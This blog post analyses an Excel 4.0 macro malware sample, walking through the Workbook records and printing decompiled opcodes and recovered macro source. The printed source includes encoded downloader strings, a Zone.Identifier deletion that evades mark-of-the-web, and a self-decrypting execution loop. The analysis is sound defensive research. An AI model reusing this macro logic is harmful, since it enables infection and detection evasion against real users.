Decompiling Excel Formula (XF) 4.0 malware

Office malware has been around for a long time. In the past I’ve written several blogs about the basics and beyond. In this blog we’ll focus on Excel Formula (XF) 4.0. I wasn’t too familiar with XF 4.0 before I started looking into it, so learn with me.

With VBA macros you’ll find these easily by decompressing some streams and look at the source (that is, if it hasn’t been removed or replaced to avoid detection). Word, if the p-code is compiled on the same VBA version, will simply run the p-code instead of compiling the source from scratch.

So when we deal with XF – where is the source? Where is the p-code? What actually runs and how does it run? That’s what I’ll try to explain in this short blog post.

All the magic happens in the Workbook stream. This is a simple stream to parse and Microsoft have documented it well. To start with, how do we see of a file with XF has a macro sheet inserted? If we look at record 133 (boundsheet8) there are clear signs that the files need more inspection (macro sheet, hidden, very hidden etc). Here are some of the records that will interest you to find more intelligence:

6Formula Contains the binary code that runs the compiled code
24LBLSpecifies a defined name
252SSTSpecifies string constants
255ExtSSTSpecifies a location of sets of strings which are shared in a table (index into the SST table).
512DimensionSpecify the range of the sheet (rows and columns)
638RkSpecifies the numeric data of a single cell
189MulRkSpecifies a series of cells with their numerical data
253LabelSstSpecifies a cell that contains a string

Armed with this we’ll attack a sample – 02cb7d611f4f45db1a9fdac6c9b0902fd246c302. When I first checked the sample (2 hours old on VT), it was detected by only 5 engines.

No alt text provided for this image

So what’s so special about it? Why did so many miss it? That’s what interested me to look into this.

It has a visible macro sheet. and this has a macro called Auto_Open (This name is a keyword defined from a list of possible names). In total it contains 2 sheets (Sheet1 and IFKPCYYA – which is the macro sheet). This info you’ll find in the BoundSheet8 record (133).

When we find the first Formula-record it looks like this:

No alt text provided for this image

What does this mean? When you look at the documentation for a Formula record you’ll find out that is has a header (20 bytes) which describes which cell and gives you more meta-data about what is going to happen. The next 2 bytes gives you the length of the actual opcodes (0x000F). The next record is 0x17 which is a PtgStr. This contains amongst others the length of the embedded string. The next opcode you’ll find is 0x1e – PgtInt which describes that an Integer is to follow. The last opcode in this section is 0x42 – PtgFuncVar. This describes what function it wants to invoke and how many parameters this function requires. To convert the formula-record above to code, you’ll get:

No alt text provided for this image

So you basically see it seems to push two variables to a stack (the string “x_b2w” and the integer 0). It then invokes the function DEFINE.NAME. It looks like it’s setting the variable “x_b2w” to 0.

The next formula looks like this:

No alt text provided for this image

After the header we see the following code being run:

No alt text provided for this image

So, it’s starting to build a while loop, while index 2 (which’ll I’ll describe shortly) is compared against the integer 49 – and as long as it’s LT (Less Than), it will iterate…

Index 2 brings me on to some of the other records you’ll need. Sometime you’ll see them reference data in sheets; strings, integers or doubles. You’ll need to access these through the records I mentioned in the beginning.

There is an Lbl record:

No alt text provided for this image

This describes two entries. The second one is the string “x_l5”. So now you know it is comparing the value x_l5 to the integer 49. Not a surprise as the previous opcode set it to 0.

This is a quest you’ll need to follow with the rest of the opcodes, and here is what it will look like once you complete this quest:

row 1, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
 17 05 00 78 5F 62 32 	PtgStr: x_b2w
 1E 00 00             	PtgInt: 0
 42 02 3D 80          	PtgFuncVar: DEFINE.NAME, param=2, tab=61, fCeFunc=1
row 2, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
 43 02 00 00 00       	PtgName: index 2
 1E 31 00             	PtgInt: 49
 09                   	PtgLt:
 41 AC 00             	PtgFunc: WHILE (172)
row 3, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
 17 04 00 78 5F 6C 35 	PtgStr: x_l5
 1F 00 00 00 00 00 00 	PtgNum: 0.000000
 42 02 3D 80          	PtgFuncVar: DEFINE.NAME, param=2, tab=61, fCeFunc=1
row 4, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
 17 05 00 78 5F 62 32 	PtgStr: x_b2w
 43 02 00 00 00       	PtgName: index 2
 1E 01 00             	PtgInt: 1
 03                   	PtgAdd:
 42 02 3D 80          	PtgFuncVar: DEFINE.NAME, param=2, tab=61, fCeFunc=1
row 5, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
 43 03 00 00 00       	PtgName: index 3
 1E 16 00             	PtgInt: 22
 09                   	PtgLt:
 41 AC 00             	PtgFunc: WHILE (172)
row 6, col 0, ifxe 15, FormulaValue=01 00 00 00 00 00 fExpr0=FFFF flags=0000
 17 04 00 78 5F 6C 35 	PtgStr: x_l5
 43 03 00 00 00       	PtgName: index 3
 1E 01 00             	PtgInt: 1
 03                   	PtgAdd:
 42 02 3D 80          	PtgFuncVar: DEFINE.NAME, param=2, tab=61, fCeFunc=1
row 7, col 0, ifxe 15, FormulaValue=02 00 1D 00 00 00 fExpr0=FFFF flags=0000
 19 01 00 00          	PtgAttrSemi:
 43 03 00 00 00       	PtgName: index 3
 1E 01 00             	PtgInt: 1
 03                   	PtgAdd:
 1E 26 00             	PtgInt: 38
 43 02 00 00 00       	PtgName: index 2
 03                   	PtgAdd:
 42 02 DB 00          	PtgFuncVar: ADDRESS, param=2, tab=219, fCeFunc=0
 42 01 94 00          	PtgFuncVar: INDIRECT, param=1, tab=148, fCeFunc=0
 17 09 00 6B 6F 76 65 	PtgStr: koveowvnb
 0B                   	PtEq:
row 8, col 0, ifxe 15, FormulaValue=02 01 1D 00 00 00 fExpr0=FFFF flags=0000
 19 01 00 00          	PtgAttrSemi:
 44 2C 00 01 C0       	PtgRef: loc col=1, row=44, value=EMPTY
 43 03 00 00 00       	PtgName: index 3
 1E 01 00             	PtgInt: 1
 03                   	PtgAdd:
 1E 26 00             	PtgInt: 38
 43 02 00 00 00       	PtgName: index 2
 03                   	PtgAdd:
 42 02 DB 00          	PtgFuncVar: ADDRESS, param=2, tab=219, fCeFunc=0
 42 01 94 00          	PtgFuncVar: INDIRECT, param=1, tab=148, fCeFunc=0
 08                   	PtgConcat:
row 9, col 0, ifxe 15, FormulaValue=02 01 1D 00 00 00 fExpr0=FFFF flags=0000
 44 07 00 00 C0       	PtgRef: loc col=0, row=7, value=EMPTY
 19 02 12 00          	PtgAttrIf: 0012
 17 04 00 78 5F 6C 35 	PtgStr: x_l5
 1E 18 00             	PtgInt: 24
 42 02 3D 80          	PtgFuncVar: DEFINE.NAME, param=2, tab=61, fCeFunc=1
 19 08 14 00          	PtgAttrGoto: 0014
 24 2C 00 01 C0       	PtgRef: loc col=1, row=44, value=EMPTY
 44 08 00 00 C0       	PtgRef: loc col=0, row=8, value=EMPTY
 41 6C 00             	PtgFunc: SET.VALUE (108)
 19 08 03 00          	PtgAttrGoto: 0003
 42 03 01 00          	PtgFuncVar: IF, param=3, tab=1, fCeFunc=0
row 10, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
 41 AE 00             	PtgFunc: NEXT (174)
row 11, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
 44 2C 00 01 C0       	PtgRef: loc col=1, row=44, value=EMPTY
 17 02 00 52 5B       	PtgStr: R[
 43 02 00 00 00       	PtgName: index 2
 08                   	PtgConcat:
 17 05 00 5D 43 5B 30 	PtgStr: ]C[0]
 08                   	PtgConcat:
 19 40 00 01          	PtgAttrSpace: 0100
 24 48 00 00 C0       	PtgRef: loc col=0, row=72, value=EMPTY
 21 4F 00             	PtgFunc: ABSREF (79)
 42 02 60 80          	PtgFuncVar: FORMULA, param=2, tab=96, fCeFunc=1
row 12, col 0, ifxe 15, FormulaValue=01 00 00 00 00 00 fExpr0=FFFF flags=0000
 24 2C 00 01 C0       	PtgRef: loc col=1, row=44, value=EMPTY
 17 00 00             	PtgStr: 
 41 6C 00             	PtgFunc: SET.VALUE (108)
row 13, col 0, ifxe 15, FormulaValue=01 01 00 00 00 00 fExpr0=FFFF flags=0000
 41 AE 00             	PtgFunc: NEXT (174)
row 202, col 0, ifxe 15, FormulaValue=01 00 00 00 00 00 fExpr0=FFFF flags=0000
 42 00 36 00          	PtgFuncVar: HALT, param=0, tab=54, fCeFunc=0

Alright, so we see 2 loops, an outer and an inner. I fixed a bug that showed me the wrong function-calls in the first version of this article. Basically you see an outer loop decrypting one line at the time with the inner loop, then calling Formula to execute the statement. This means it’s hidden code present and there should be no reason not to block this file.

Also, you’ll need to find the data in the locations it reads and writes to – hence the other records you need to enumerate to access and decode the contents of locations.

What more can we extract from this sample from looking at the Workbook stream? Some source-code? Hmmmm. There is a way..    

=SET.VALUE(R1C3,"adadadadadadad")
=SET.VALUE(R1C3,"pupupupupupupupupupupupupupupupupupupu")
=SET.VALUE(R2C3,"efefefefefefefef")
=SET.VALUE(R2C3,"ipipipipipipipipip")
=SET.VALUE(R3C3,"g4g4g4")
=SET.VALUE(R3C3,"ieieieieieieieieie")
=SET.VALUE(R4C3,"zhzhzhzhzhzhzhzhzh")
=SET.VALUE(R4C3,"fifififififififififififififififififififi")
=SET.VALUE(R5C3,"f5")
=SET.VALUE(R5C3,"hjhjhjhjhjhjhjhjhjhjhjhjhjhj")
=SET.VALUE(R6C3,"ccccc")
=SET.VALUE(R6C3,"rarararararararararararararara")
=SET.VALUE(R1C3,"<EDGHOD/MBLF'#obsi^`!-!]Ttdsr]Ovamhd[Endtndost[#(")
=SET.VALUE(R2C3,"<EDGHOD/MBLF'#ejkf^`!-EPOFM)obsi^`%#qd-kr#+4(*")
=SET.VALUE(R3C3,"GVSHUDMM)ejkf^`+#ubq!u20>mfv!@dsjufWPakdds)!#Ljbsntngs/WNKISUO#!*:#(")
=SET.VALUE(R4C3,"<GVSHUDMM)ejkf^`+#u20/nqdo'#!HDU!#+#!isuot90.dnvqtddnnap-dnn.dnnap-qgq>1-715567445/:41790#!-ebktd*:#(")
=SET.VALUE(R5C3,"<GVSHUDMM)ejkf^`+#u20/rfme'*:#(")
=SET.VALUE(R6C3,"<GVSHUDMM)ejkf^`+#ubq!az<odx­BbuhwdYNcifbu'#!BCPCC-Tssdbl#!*:#(")
=SET.VALUE(R7C3,"<GVSHUDMM)ejkf^`+#az-pofm)(<!*")
=SET.VALUE(R8C3,"<GVSHUDMM)ejkf^`+#az-uxqd>0<!*")
=SET.VALUE(R9C3,"<GVSHUDMM)ejkf^`+#az-xqjsf'w02-sdtopmtdCnex*!*")
=SET.VALUE(R10C3,"<GVSHUDMM)ejkf^`+#az-T`wdUnGhmd)!#[]Ttdsr][Qtckjb][Endtndost[]id-dom!#+3(<!*")
=SET.VALUE(R11C3,"<GVSHUDMM)ejkf^`+#az-dkprf'*:#(")
=SET.VALUE(R12C3,"<GBMNTD)ejkf^`(")
=SET.VALUE(R13C3,"<FWFB)!fwqkpqfq/dyd!!'obsi^`%#qd-kr#(")
=SET.VALUE(R14C3,"<XGJKF'JRFQSNS'GHMDT'q`ug`^'!kb/bqk#(*(")
=SET.VALUE(R15C3,"<X@JS)MPV)(,!1/;/1910#(")
=SET.VALUE(R16C3,"<ODYS)(")
=SET.VALUE(R17C3,"<GHMD/CFKFSF'q`ug`^'!sb/it!*")
=SET.VALUE(R18C3,"<FWFB)!fwqkpqfq/dyd!!'obsi^`%#id-dom!*­!­!")
=SET.VALUE(R19C3,"")
=ERROR(TRUE,R1C1)       
=FILE.DELETE(GET.DOCUMENT(IF(COS(RAND())<3,1,100)+1)&"\\"&GET.DOCUMENT(88)&":Zone.Identifier")
=ERROR(FALSE)  
=SET.VALUE(R21C4,202)
=SET.VALUE(R21C4,IF(SIN(LEN(GET.WORKSPACE(1)))<2,IF(RESET.TOOLBAR(1),1,100),100))
=WHILE(R21C4<=20)     
=SET.VALUE(R23C4,INDIRECT(ADDRESS(R21C4,3)))                  
=SET.VALUE(R24C4,LEN(R23C4))        
=SET.VALUE(R57C5,"")                  
=SET.VALUE(R27C4,1)         
=WHILE(R27C4<=R24C4)
=SET.VALUE(R57C5,R57C5&CHAR(CODE(MID(R23C4,R27C4,1))+IF(MOD(R27C4,2)=0,-1,1)))
=SET.VALUE(R27C4,R27C4+1)
=NEXT()         
=SET.VALUE(R21C4,R21C4+1)           
=FORMULA(R57C5, ABSREF("R["&R21C4&"]C[0]",R41C2))
=NEXT()        

=RUN(R41C2)                    

This code seems to differ from the compiled code in some ways, that’s something worth investigating. I’ll write another article about that later. It’s not hard to extract this context, but it requires some logic.

Going from here you have many options to take this to the next level. I see no reason why so many engines failed to detect this sample.

Writing good support for XF 4.0 should be an effort more anti-malware companies should do. Let me know if you need help.

One thought on “Decompiling Excel Formula (XF) 4.0 malware

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: